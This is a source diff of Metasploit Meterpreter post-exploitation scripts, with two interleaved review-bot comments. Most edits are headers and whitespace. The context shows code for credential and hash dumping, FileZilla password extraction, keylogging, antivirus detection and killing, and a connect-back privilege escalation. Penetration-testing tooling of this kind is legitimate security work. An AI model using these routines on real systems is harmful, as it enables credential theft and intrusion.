diff --git a/scripts/meterpreter/get_env.rb b/scripts/meterpreter/get_env.rb
index 9c5dee59c5..ec7c8a199b 100644
--- a/scripts/meterpreter/get_env.rb
+++ b/scripts/meterpreter/get_env.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision: $
#-------------------------------------------------------------------------------
#Options and Option Parsing
opts = Rex::Parser::Arguments.new(
diff --git a/scripts/meterpreter/get_filezilla_creds.rb b/scripts/meterpreter/get_filezilla_creds.rb
index 60def76d46..f8213c1ee2 100644
--- a/scripts/meterpreter/get_filezilla_creds.rb
+++ b/scripts/meterpreter/get_filezilla_creds.rb
@@ -1,5 +1,6 @@
##
# $Id$
+# $Revision: $
##
require "rexml/document"
@@ -84,10 +85,10 @@ def extract_saved_creds(path,xml_file)
print_status "\tUser: #{e.elements["User"].text}"
creds << "User: #{e.elements["User"].text}"
print_status "\tPassword: #{e.elements["Pass"].text}"
- creds << "Password: #{e.elements["Pass"].text}"
+ creds << "Password: #{e.elements["Pass"].text}"
elsif logon_type =~ /2|3/
- print_status "\tUser: #{e.elements["User"].text}"
- creds << "User: #{e.elements["User"].text}"
+ print_status "\tUser: #{e.elements["User"].text}"
+ creds << "User: #{e.elements["User"].text}"
end
proto = e.elements["Protocol"].text
diff --git a/scripts/meterpreter/get_local_subnets.rb b/scripts/meterpreter/get_local_subnets.rb
index f52f5ee410..dec55fa353 100644
--- a/scripts/meterpreter/get_local_subnets.rb
+++ b/scripts/meterpreter/get_local_subnets.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
# Meterpreter script that display local subnets
# Provided by Nicob
@@ -22,9 +23,9 @@ end
}
client.net.config.each_route { |route|
- # Remove multicast and loopback interfaces
- next if route.subnet =~ /^(224\.|127\.)/
- next if route.subnet == '0.0.0.0'
- next if route.netmask == '255.255.255.255'
- print_line("Local subnet: #{route.subnet}/#{route.netmask}")
+ # Remove multicast and loopback interfaces
+ next if route.subnet =~ /^(224\.|127\.)/
+ next if route.subnet == '0.0.0.0'
+ next if route.netmask == '255.255.255.255'
+ print_line("Local subnet: #{route.subnet}/#{route.netmask}")
}
diff --git a/scripts/meterpreter/get_valid_community.rb b/scripts/meterpreter/get_valid_community.rb
old mode 100755
new mode 100644
index 76c6112074..b08df8b9de
--- a/scripts/meterpreter/get_valid_community.rb
+++ b/scripts/meterpreter/get_valid_community.rb
@@ -1,3 +1,6 @@
+# $Id$
+# $Revision$
+
#copied getvncpw - thanks grutz/carlos
session = client
diff --git a/scripts/meterpreter/getcountermeasure.rb b/scripts/meterpreter/getcountermeasure.rb
index e0406f1b12..ce0ad27824 100644
--- a/scripts/meterpreter/getcountermeasure.rb
+++ b/scripts/meterpreter/getcountermeasure.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#
# Meterpreter script for detecting AV, HIPS, Third Party Firewalls, DEP Configuration and Windows Firewall configuration.
# Provides also the option to kill the processes of detected products and disable the built-in firewall.
@@ -111,9 +112,9 @@ avs = %W{
defwatch.exe
f-agnt95.exe
fpavupdm.exe
- f-prot95.exe
- f-prot.exe
- fprot.exe
+ f-prot95.exe
+ f-prot.exe
+ fprot.exe
fsaua.exe
fsav32.exe
f-sched.exe
@@ -121,7 +122,7 @@ avs = %W{
fsm32.exe
fsma32.exe
fssm32.exe
- f-stopw.exe
+ f-stopw.exe
f-stopw.exe
fwservice.exe
fwsrv.exe
diff --git a/scripts/meterpreter/gettelnet.rb b/scripts/meterpreter/gettelnet.rb
index 009fd967f5..a65c4120d0 100644
--- a/scripts/meterpreter/gettelnet.rb
+++ b/scripts/meterpreter/gettelnet.rb
@@ -40,7 +40,7 @@ end
def insttlntsrv()
trgtos = @client.sys.config.sysinfo['OS']
if trgtos =~ /Vista|7|2008/
- puts("Checking if Telnet Service is Installed")
+ print_status("Checking if Telnet Service is Installed")
if checkifinst()
print_status("Telnet Service Installed on Target")
else
@@ -52,7 +52,7 @@ def insttlntsrv()
@client.sys.process.get_processes().each do |x|
found =1
if prog2check == (x['name'].downcase)
- puts "*"
+ print_line "*"
sleep(0.5)
found = 0
end
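Review bot: The new `print_line "*"` drops the parentheses that the same commit keeps on `print_status("Checking if Telnet Service is Installed")` in this file's earlier hunk, so one normalization pass leaves the two output calls in two styles; `print_line("*")` would match. The replacement of `puts` itself looks right for a Meterpreter script, since `puts` presumably writes to the framework process's stdout rather than the session's output stream, but that routing is not visible in the hunk. The enclosing `insttlntsrv()` method starts and ends outside the hunk.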
diff --git a/scripts/meterpreter/hashdump.rb b/scripts/meterpreter/hashdump.rb
index 920630c2e5..5b88c13f4e 100644
--- a/scripts/meterpreter/hashdump.rb
+++ b/scripts/meterpreter/hashdump.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#
# Implement pwdump (hashdump) through registry reads + syskey
@@ -30,22 +31,22 @@ opts.parse(args) { |opt, idx, val|
@sam_empty_nt = ["31d6cfe0d16ae931b73c59d7e0c089c0"].pack("H*")
@des_odd_parity = [
- 1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
- 16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
- 32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
- 49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
- 64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
- 81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
- 97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
- 112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
- 128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
- 145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
- 161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
- 176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
- 193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
- 208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
- 224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
- 241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254
+ 1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
+ 16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
+ 32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
+ 49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
+ 64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
+ 81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
+ 97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
+ 112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
+ 128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
+ 145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
+ 161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
+ 176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
+ 193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
+ 208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
+ 224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
+ 241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254
]
def capture_boot_key
@@ -86,7 +87,7 @@ def capture_hboot_key(bootkey)
rc4.key = hash.digest
hbootkey = rc4.update(vf[0x80, 32])
hbootkey << rc4.final
- return hbootkey
+ return hbootkey
end
def capture_user_keys
diff --git a/scripts/meterpreter/hostsedit.rb b/scripts/meterpreter/hostsedit.rb
index 40f1b1a2bf..f86fe6e5ba 100644
--- a/scripts/meterpreter/hostsedit.rb
+++ b/scripts/meterpreter/hostsedit.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
# Meterpreter script for modifying the hosts file in windows
# given a single entrie or several in a file and clear the
# DNS cache on the target machine.
diff --git a/scripts/meterpreter/keylogrecorder.rb b/scripts/meterpreter/keylogrecorder.rb
index ae8f202f5a..62965a9d27 100644
--- a/scripts/meterpreter/keylogrecorder.rb
+++ b/scripts/meterpreter/keylogrecorder.rb
@@ -87,7 +87,7 @@ def startkeylogger(session)
begin
#print_status("Grabbing Desktop Keyboard Input...")
#session.ui.grab_desktop
- print_status("Starting the keystroke sniffer...")
+ print_status("Starting the keystroke sniffer...")
session.ui.keyscan_start
return true
rescue
diff --git a/scripts/meterpreter/killav.rb b/scripts/meterpreter/killav.rb
index bc48fc440f..a631f01f1f 100644
--- a/scripts/meterpreter/killav.rb
+++ b/scripts/meterpreter/killav.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#
# Meterpreter script that kills all Antivirus processes
# Provided by: Jerome Athias
diff --git a/scripts/meterpreter/metsvc.rb b/scripts/meterpreter/metsvc.rb
index 5cec941082..f1087e53ac 100644
--- a/scripts/meterpreter/metsvc.rb
+++ b/scripts/meterpreter/metsvc.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#
# Meterpreter script for installing the meterpreter service
diff --git a/scripts/meterpreter/migrate.rb b/scripts/meterpreter/migrate.rb
index 34bacad9fd..e2f42bc739 100644
--- a/scripts/meterpreter/migrate.rb
+++ b/scripts/meterpreter/migrate.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#
# Simple example script that migrates to a specific process by name.
# This is meant as an illustration.
diff --git a/scripts/meterpreter/multi_console_command.rb b/scripts/meterpreter/multi_console_command.rb
index d63b5e888c..7fe7850a33 100644
--- a/scripts/meterpreter/multi_console_command.rb
+++ b/scripts/meterpreter/multi_console_command.rb
@@ -11,10 +11,11 @@
# Setting Arguments
@@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false,"Help menu." ],
- "-cl" => [ true,"Commands to execute. The command must be enclosed in double quotes and separated by a comma."],
- "-rc" => [ true,"Text file with list of commands, one per line."]
+ "-h" => [ false,"Help menu." ],
+ "-cl" => [ true,"Commands to execute. The command must be enclosed in double quotes and separated by a comma."],
+ "-rc" => [ true,"Text file with list of commands, one per line."]
)
+
#Setting Argument variables
commands = []
script = []
@@ -46,30 +47,29 @@ def usage
end
################## Main ##################
@@exec_opts.parse(args) { |opt, idx, val|
- case opt
-
- when "-cl"
- commands = val.split(",")
- when "-rc"
- script = val
- if not ::File.exists?(script)
- raise "Command List File does not exists!"
- else
- ::File.open(script, "r").each_line do |line|
- commands << line.chomp
- end
- end
-
- when "-h"
- help = 1
- end
-
+ case opt
+
+ when "-cl"
+ commands = val.split(",")
+ when "-rc"
+ script = val
+ if not ::File.exists?(script)
+ raise "Command List File does not exists!"
+ else
+ ::File.open(script, "r").each_line do |line|
+ commands << line.chomp
+ end
+ end
+
+ when "-h"
+ help = 1
+ end
}
if args.length == 0 or help == 1
usage
else
- list_con_exec(commands)
- raise Rex::Script::Completed
+ list_con_exec(commands)
+ raise Rex::Script::Completed
end
diff --git a/scripts/meterpreter/multicommand.rb b/scripts/meterpreter/multicommand.rb
index dc105c0496..707b292bef 100644
--- a/scripts/meterpreter/multicommand.rb
+++ b/scripts/meterpreter/multicommand.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#Meterpreter script for running multiple commands on Windows 2003, Windows Vista
# and Windows XP and Windows 2008 targets.
#Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
@@ -8,10 +9,10 @@ session = client
wininfo = client.sys.config.sysinfo
# Setting Arguments
@@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false,"Help menu." ],
- "-cl" => [ true,"Commands to execute. The command must be enclosed in double quotes and separated by a comma."],
- "-f" => [ true,"File where to saved output of command."],
- "-rc" => [ true,"Text file with list of commands, one per line."]
+ "-h" => [ false,"Help menu." ],
+ "-cl" => [ true,"Commands to execute. The command must be enclosed in double quotes and separated by a comma."],
+ "-f" => [ true,"File where to saved output of command."],
+ "-rc" => [ true,"Text file with list of commands, one per line."]
)
#Setting Argument variables
commands = []
@@ -52,11 +53,11 @@ def list_exec(session,cmdlst)
end
# Function for writing results of other functions to a file
def filewrt(file2wrt, data2wrt)
- output = ::File.open(file2wrt, "a")
- data2wrt.each_line do |d|
- output.puts(d)
- end
- output.close
+ output = ::File.open(file2wrt, "a")
+ data2wrt.each_line do |d|
+ output.puts(d)
+ end
+ output.close
end
def usage
diff --git a/scripts/meterpreter/multiscript.rb b/scripts/meterpreter/multiscript.rb
index fbfb18700e..c798ca1452 100644
--- a/scripts/meterpreter/multiscript.rb
+++ b/scripts/meterpreter/multiscript.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#Meterpreter script for running multiple scripts on a Meterpreter Session
#Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
#Verion: 0.2
diff --git a/scripts/meterpreter/netenum.rb b/scripts/meterpreter/netenum.rb
index e9d33a6f51..fd07509429 100644
--- a/scripts/meterpreter/netenum.rb
+++ b/scripts/meterpreter/netenum.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#
#Meterpreter script for ping sweeps on Windows 2003, Windows Vista
#Windows 2008 and Windows XP targets using native windows commands.
@@ -7,16 +8,15 @@
#Note:
################## Variable Declarations ##################
@@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "Help menu."],
- "-r" => [ true, "The target address range or CIDR identifier"],
- "-ps" => [ false, "To Perform Ping Sweep on IP Range"],
- "-rl" => [ false, "To Perform DNS Reverse Lookup on IP Range"],
- "-fl" => [ false, "To Perform DNS Forward Lookup on host list and domain"],
- "-hl" => [ true, "File with Host List for DNS Forward Lookup"],
- "-d" => [ true, "Domain Name for DNS Forward Lookup"],
- "-st" => [ false, "To Perform DNS lookup of MX and NS records for a domain"],
- "-sr" => [ false, "To Perform Service Record DNS lookup for a domain"]
-
+ "-h" => [ false, "Help menu."],
+ "-r" => [ true, "The target address range or CIDR identifier"],
+ "-ps" => [ false, "To Perform Ping Sweep on IP Range"],
+ "-rl" => [ false, "To Perform DNS Reverse Lookup on IP Range"],
+ "-fl" => [ false, "To Perform DNS Forward Lookup on host list and domain"],
+ "-hl" => [ true, "File with Host List for DNS Forward Lookup"],
+ "-d" => [ true, "Domain Name for DNS Forward Lookup"],
+ "-st" => [ false, "To Perform DNS lookup of MX and NS records for a domain"],
+ "-sr" => [ false, "To Perform Service Record DNS lookup for a domain"]
)
session = client
host,port = session.tunnel_peer.split(':')
@@ -44,15 +44,15 @@ def stdlookup(session,domain,dest)
results = []
garbage = []
types.each do |t|
- begin
- r = session.sys.process.execute("nslookup -type=#{t} #{domain}", nil, {'Hidden' => true, 'Channelized' => true})
- while(d = r.channel.read)
- mxout << d
- end
- r.channel.close
- r.close
- results = mxout.join.split(/\n/)
- results.each do |rec|
+ begin
+ r = session.sys.process.execute("nslookup -type=#{t} #{domain}", nil, {'Hidden' => true, 'Channelized' => true})
+ while(d = r.channel.read)
+ mxout << d
+ end
+ r.channel.close
+ r.close
+ results = mxout.join.split(/\n/)
+ results.each do |rec|
if rec.match(/\s*internet\saddress\s\=\s/)
garbage << rec.split(/\s*internet\saddress\s\=/)
print_status("#{garbage[0].join.sub(" "," ")} #{t} ")
@@ -60,13 +60,14 @@ def stdlookup(session,domain,dest)
garbage.clear
end
garbage.clear
+ end
+
+ rescue ::Exception => e
+ print_status("The following Error was encountered: #{e.class} #{e}")
end
-
- rescue ::Exception => e
- print_status("The following Error was encountered: #{e.class} #{e}")
- end
end
end
+
#-------------------------------------------------------------------------------
# Function for writing results of other functions to a file
def filewrt(file2wrt, data2wrt)
@@ -76,6 +77,7 @@ def filewrt(file2wrt, data2wrt)
end
output.close
end
+
#-------------------------------------------------------------------------------
# Function for Executing Reverse lookups
def reverselookup(session,iprange,dest)
@@ -86,49 +88,50 @@ def reverselookup(session,iprange,dest)
i, a = 0, []
begin
ipadd = Rex::Socket::RangeWalker.new(iprange)
- numip = ipadd.num_ips
- while (iplst.length < numip)
- ipa = ipadd.next_ip
- if (not ipa)
- break
- end
- iplst << ipa
- end
+ numip = ipadd.num_ips
+ while (iplst.length < numip)
+ ipa = ipadd.next_ip
+ if (not ipa)
+ break
+ end
+ iplst << ipa
+ end
begin
- iplst.each do |ip|
- if i < 10
- a.push(::Thread.new {
- r = session.sys.process.execute("nslookup #{ip}", nil, {'Hidden' => true, 'Channelized' => true})
- while(d = r.channel.read)
- if d =~ /(Name)/
- d.scan(/Name:\s*\S*\s/) do |n|
- hostname = n.split(": ")
- print_status "\t #{ip} is #{hostname[1].chomp("\n")}"
- filewrt(dest,"#{ip} is #{hostname[1].chomp("\n")}")
- end
- break
-
- end
-
- end
-
- r.channel.close
- r.close
-
- })
- i += 1
- else
- sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty?
- i = 0
- end
- end
- a.delete_if {|x| not x.alive?} while not a.empty?
- end
+ iplst.each do |ip|
+ if i < 10
+ a.push(::Thread.new {
+ r = session.sys.process.execute("nslookup #{ip}", nil, {'Hidden' => true, 'Channelized' => true})
+ while(d = r.channel.read)
+ if d =~ /(Name)/
+ d.scan(/Name:\s*\S*\s/) do |n|
+ hostname = n.split(": ")
+ print_status "\t #{ip} is #{hostname[1].chomp("\n")}"
+ filewrt(dest,"#{ip} is #{hostname[1].chomp("\n")}")
+ end
+ break
+
+ end
+
+ end
+
+ r.channel.close
+ r.close
+
+ })
+ i += 1
+ else
+ sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty?
+ i = 0
+ end
+ end
+ a.delete_if {|x| not x.alive?} while not a.empty?
+ end
rescue ::Exception => e
- print_status("The following Error was encountered: #{e.class} #{e}")
-
+ print_status("The following Error was encountered: #{e.class} #{e}")
+
end
end
+
#-------------------------------------------------------------------------------
#Function for Executing Forward Lookups
def frwdlp(session,hostlst,domain,dest)
@@ -139,38 +142,39 @@ def frwdlp(session,hostlst,domain,dest)
threads = []
tmpout = []
begin
- if ::File.exists?(hostlst)
- ::File.open(hostlst).each {|line|
- threads << ::Thread.new(line) { |h|
- #print_status("checking #{h.chomp}")
- r = session.sys.process.execute("nslookup #{h.chomp}.#{domain}", nil, {'Hidden' => true, 'Channelized' => true})
- while(d = r.channel.read)
- if d =~ /(Name)/
- d.scan(/Name:\s*\S*\s*Address\w*:\s*.*?.*?.*/) do |n|
- tmpout << n.split
- end
- break
- end
- end
-
- r.channel.close
- r.close
+ if ::File.exists?(hostlst)
+ ::File.open(hostlst).each {|line|
+ threads << ::Thread.new(line) { |h|
+ #print_status("checking #{h.chomp}")
+ r = session.sys.process.execute("nslookup #{h.chomp}.#{domain}", nil, {'Hidden' => true, 'Channelized' => true})
+ while(d = r.channel.read)
+ if d =~ /(Name)/
+ d.scan(/Name:\s*\S*\s*Address\w*:\s*.*?.*?.*/) do |n|
+ tmpout << n.split
+ end
+ break
+ end
+ end
+
+ r.channel.close
+ r.close
+ }
}
- }
- threads.each { |aThread| aThread.join }
- tmpout.uniq.each do |t|
- print_status("\t#{t.join.sub(/Address\w*:/, "\t")}")
- filewrt(dest,"#{t.join.sub(/Address\w*:/, "\t")}")
- end
-
- else
- print_status("File #{hostlst}does not exists!")
- exit
- end
+ threads.each { |aThread| aThread.join }
+ tmpout.uniq.each do |t|
+ print_status("\t#{t.join.sub(/Address\w*:/, "\t")}")
+ filewrt(dest,"#{t.join.sub(/Address\w*:/, "\t")}")
+ end
+
+ else
+ print_status("File #{hostlst}does not exists!")
+ exit
+ end
rescue ::Exception => e
- print_status("The following Error was encountered: #{e.class} #{e}")
+ print_status("The following Error was encountered: #{e.class} #{e}")
end
end
+
#-------------------------------------------------------------------------------
#Function for Executing Ping Sweep
def pingsweep(session,iprange,dest)
@@ -184,42 +188,42 @@ def pingsweep(session,iprange,dest)
numip = ipadd.num_ips
while (iplst.length < numip)
ipa = ipadd.next_ip
- if (not ipa)
- break
- end
+ if (not ipa)
+ break
+ end
iplst << ipa
end
begin
- iplst.each do |ip|
- if i < 10
- a.push(::Thread.new {
- r = session.sys.process.execute("ping #{ip} -n 1", nil, {'Hidden' => true, 'Channelized' => true})
- while(d = r.channel.read)
- if d =~ /(Reply)/
- print_status "\t#{ip} host found"
- filewrt(dest,"#{ip} host found")
- r.channel.close
- elsif d =~ /(Antwort)/
- print_status "\t#{ip} host found"
- filewrt(dest,"#{ip} host found")
- r.channel.close
- end
- end
- r.channel.close
- r.close
-
- })
- i += 1
- else
- sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty?
- i = 0
- end
- end
- a.delete_if {|x| not x.alive?} while not a.empty?
- end
+ iplst.each do |ip|
+ if i < 10
+ a.push(::Thread.new {
+ r = session.sys.process.execute("ping #{ip} -n 1", nil, {'Hidden' => true, 'Channelized' => true})
+ while(d = r.channel.read)
+ if d =~ /(Reply)/
+ print_status "\t#{ip} host found"
+ filewrt(dest,"#{ip} host found")
+ r.channel.close
+ elsif d =~ /(Antwort)/
+ print_status "\t#{ip} host found"
+ filewrt(dest,"#{ip} host found")
+ r.channel.close
+ end
+ end
+ r.channel.close
+ r.close
+
+ })
+ i += 1
+ else
+ sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty?
+ i = 0
+ end
+ end
+ a.delete_if {|x| not x.alive?} while not a.empty?
+ end
rescue ::Exception => e
- print_status("The following Error was encountered: #{e.class} #{e}")
-
+ print_status("The following Error was encountered: #{e.class} #{e}")
+
end
end
#-------------------------------------------------------------------------------
@@ -229,9 +233,10 @@ def srvreclkp(session,domain,dest)
srout = []
garbage = []
srvrcd = [
- "_gc._tcp.","_kerberos._tcp.", "_kerberos._udp.","_ldap._tcp.","_test._tcp.",
- "_sips._tcp.","_sip._udp.","_sip._tcp.","_aix._tcp.","_aix._tcp.","_finger._tcp.",
- "_ftp._tcp.","_http._tcp.","_nntp._tcp.","_telnet._tcp.","_whois._tcp."]
+ "_gc._tcp.","_kerberos._tcp.", "_kerberos._udp.","_ldap._tcp.","_test._tcp.",
+ "_sips._tcp.","_sip._udp.","_sip._tcp.","_aix._tcp.","_aix._tcp.","_finger._tcp.",
+ "_ftp._tcp.","_http._tcp.","_nntp._tcp.","_telnet._tcp.","_whois._tcp."
+ ]
print_status("Performing SRV Record Enumeration for #{domain}")
filewrt(dest,"SRV Record Enumeration for #{domain}")
srvrcd.each do |srv|
@@ -276,33 +281,33 @@ srvrc = nil
# Parsing of Options
@@exec_opts.parse(args) { |opt, idx, val|
case opt
- when "-sr"
- srvrc = 1
- when "-rl"
- rvrslkp = 1
- when "-fl"
- frdlkp = 1
- when "-ps"
- pngsp = 1
- when "-st"
- stdlkp = 1
- when "-d"
- dom = val
- when "-hl"
- hostlist = val
- when "-r"
- range = val
-
- when "-h"
- print(
- "Network Enumerator Meterpreter Script\n" +
- "Usage:\n" +
- @@exec_opts.usage
- )
- helpcall = 1
- end
-
+ when "-sr"
+ srvrc = 1
+ when "-rl"
+ rvrslkp = 1
+ when "-fl"
+ frdlkp = 1
+ when "-ps"
+ pngsp = 1
+ when "-st"
+ stdlkp = 1
+ when "-d"
+ dom = val
+ when "-hl"
+ hostlist = val
+ when "-r"
+ range = val
+
+ when "-h"
+ print(
+ "Network Enumerator Meterpreter Script\n" +
+ "Usage:\n" +
+ @@exec_opts.usage
+ )
+ helpcall = 1
+ end
}
+
if client.platform =~ /win32|win64/
if range != nil && pngsp == 1
message(logs)
@@ -320,10 +325,9 @@ if client.platform =~ /win32|win64/
message(logs)
srvreclkp(session,dom,dest)
elsif helpcall == nil
- print(
- "Network Enumerator Meterpreter Script\n" +
- "Usage: \n" +
- @@exec_opts.usage)
+ print("Network Enumerator Meterpreter Script\n" +
+ "Usage: \n" +
+ @@exec_opts.usage)
end
else
diff --git a/scripts/meterpreter/panda_2007_pavsrv51.rb b/scripts/meterpreter/panda_2007_pavsrv51.rb
index eb8ea21edf..1965d47e43 100644
--- a/scripts/meterpreter/panda_2007_pavsrv51.rb
+++ b/scripts/meterpreter/panda_2007_pavsrv51.rb
@@ -1,4 +1,5 @@
# $Id: panda_2007_pavsrv51.rb 8734 2010-03-07 22:49:08Z mc $
+# $Revision: $
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -13,7 +14,7 @@
# local attacker can gain elevated privileges.
#
# This script has only been tested against Panda Antivirus 2007.
-#
+#
# BID - 4257
# mc[@]metasploit.com
##
@@ -22,9 +23,9 @@
# Options
#
opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "This help menu"],
- "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
- "-p" => [ true, "The port on the remote host where Metasploit is listening"]
+ "-h" => [ false, "This help menu"],
+ "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
+ "-p" => [ true, "The port on the remote host where Metasploit is listening"]
)
#
@@ -38,16 +39,16 @@ rport = 4444
# Option parsing
#
opts.parse(args) do |opt, idx, val|
- case opt
- when "-h"
- print_status("Panda Antivirus 2007 privilege escalation.")
+ case opt
+ when "-h"
+ print_status("Panda Antivirus 2007 privilege escalation.")
print_line(opts.usage)
raise Rex::Script::Completed
- when "-r"
- rhost = val
- when "-p"
- rport = val.to_i
- end
+ when "-r"
+ rhost = val
+ when "-p"
+ rport = val.to_i
+ end
end
if client.platform =~ /win32|win64/
client.sys.process.get_processes().each do |m|
diff --git a/scripts/meterpreter/pml_driver_config.rb b/scripts/meterpreter/pml_driver_config.rb
index 9c022505f1..f004237842 100644
--- a/scripts/meterpreter/pml_driver_config.rb
+++ b/scripts/meterpreter/pml_driver_config.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
diff --git a/scripts/meterpreter/powerdump.rb b/scripts/meterpreter/powerdump.rb
index b50480c07b..772efa94b1 100644
--- a/scripts/meterpreter/powerdump.rb
+++ b/scripts/meterpreter/powerdump.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#
# Meterpreter script for utilizing purely PowerShell to extract username and password hashes through registry
# keys. This script requires you to be running as system in order to work properly. This has currently been
@@ -46,12 +47,12 @@ def dumphash(session)
begin
while ((data = hashes.read) != nil)
data=data.strip
- puts(data)
+ print_line(data)
end
rescue EOFError
ensure
hashes.close
- end
+ end
print_status("Setting Execution policy back to Restricted...")
session.sys.process.execute("powershell Set-ExecutionPolicy Unrestricted", nil, {'Hidden' => 'true', 'Channelized' => true})
print_status("Cleaning up after ourselves...")
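Review bot: The status line before the last `print_status` in this hunk announces that the execution policy is being set back to Restricted, but the command on the next line passes `Set-ExecutionPolicy Unrestricted`, so the "cleanup" leaves the host's policy as loosened as the script made it rather than restoring it. Unless an earlier step outside the hunk records the original policy, the restore should be `session.sys.process.execute("powershell Set-ExecutionPolicy Restricted", nil, {'Hidden' => 'true', 'Channelized' => true})`, and if the original value is captured it is better to restore that instead. The empty `rescue EOFError` above is a legitimate end-of-stream marker, but a comment such as `# EOF from the channel simply ends the read loop` would keep it from reading as a swallowed error. `dumphash` begins outside the hunk.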
diff --git a/scripts/meterpreter/prefetchtool.rb b/scripts/meterpreter/prefetchtool.rb
index 8f90ebf8db..0623cc20f8 100644
--- a/scripts/meterpreter/prefetchtool.rb
+++ b/scripts/meterpreter/prefetchtool.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#Meterpreter script for extracting information from windows prefetch folder
#Provided by Milo at keith.lee2012[at]gmail.com
#Verion: 0.1.0
@@ -12,13 +13,13 @@ require 'digest/sha1'
# Script Options
@@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "Help menu."],
- "-p" => [ false, "List Installed Programs"],
- "-c" => [ false, "Disable SHA1/MD5 checksum"],
- "-x" => [ true, "Top x Accessed Executables (Based on Prefetch folder)"],
- "-i" => [ false, "Perform lookup for software name"],
- "-l" => [ false, "Download Prefetch Folder Analysis Log"]
- )
+ "-h" => [ false, "Help menu."],
+ "-p" => [ false, "List Installed Programs"],
+ "-c" => [ false, "Disable SHA1/MD5 checksum"],
+ "-x" => [ true, "Top x Accessed Executables (Based on Prefetch folder)"],
+ "-i" => [ false, "Perform lookup for software name"],
+ "-l" => [ false, "Download Prefetch Folder Analysis Log"]
+)
@tempdir = @session.fs.file.expand_path("%TEMP%")
diff --git a/scripts/meterpreter/process_memdump.rb b/scripts/meterpreter/process_memdump.rb
index a5a404341d..2b3c18560a 100644
--- a/scripts/meterpreter/process_memdump.rb
+++ b/scripts/meterpreter/process_memdump.rb
@@ -27,9 +27,9 @@ opts.parse(args) { |opt, idx, val|
when "-h"
print_line("")
print_line("USAGE:")
- print_line("EXAMPLE: run process_dump putty.exe")
- print_line("EXAMPLE: run process_dump -p 1234")
- print_line(opts.usage)
+ print_line("EXAMPLE: run process_dump putty.exe")
+ print_line("EXAMPLE: run process_dump -p 1234")
+ print_line(opts.usage)
raise Rex::Script::Completed
when "-p"
pid = val
@@ -40,15 +40,15 @@ opts.parse(args) { |opt, idx, val|
when "-q"
query = true
when "-r"
- list = val
+ list = val
resource = ""
- if not ::File.exists?(list)
- raise "Command List File does not exists!"
- else
- ::File.open(list, "r").each_line do |line|
- resource << line
- end
- end
+ if not ::File.exists?(list)
+ raise "Command List File does not exists!"
+ else
+ ::File.open(list, "r").each_line do |line|
+ resource << line
+ end
+ end
end
}
@@ -107,7 +107,7 @@ def dump_mem(pid,name, toggle)
base_size += mbi["RegionSize"]
end
print_status("Saving Dumped Memory to #{dumpfile}")
-
+
end
# Function to query process Size
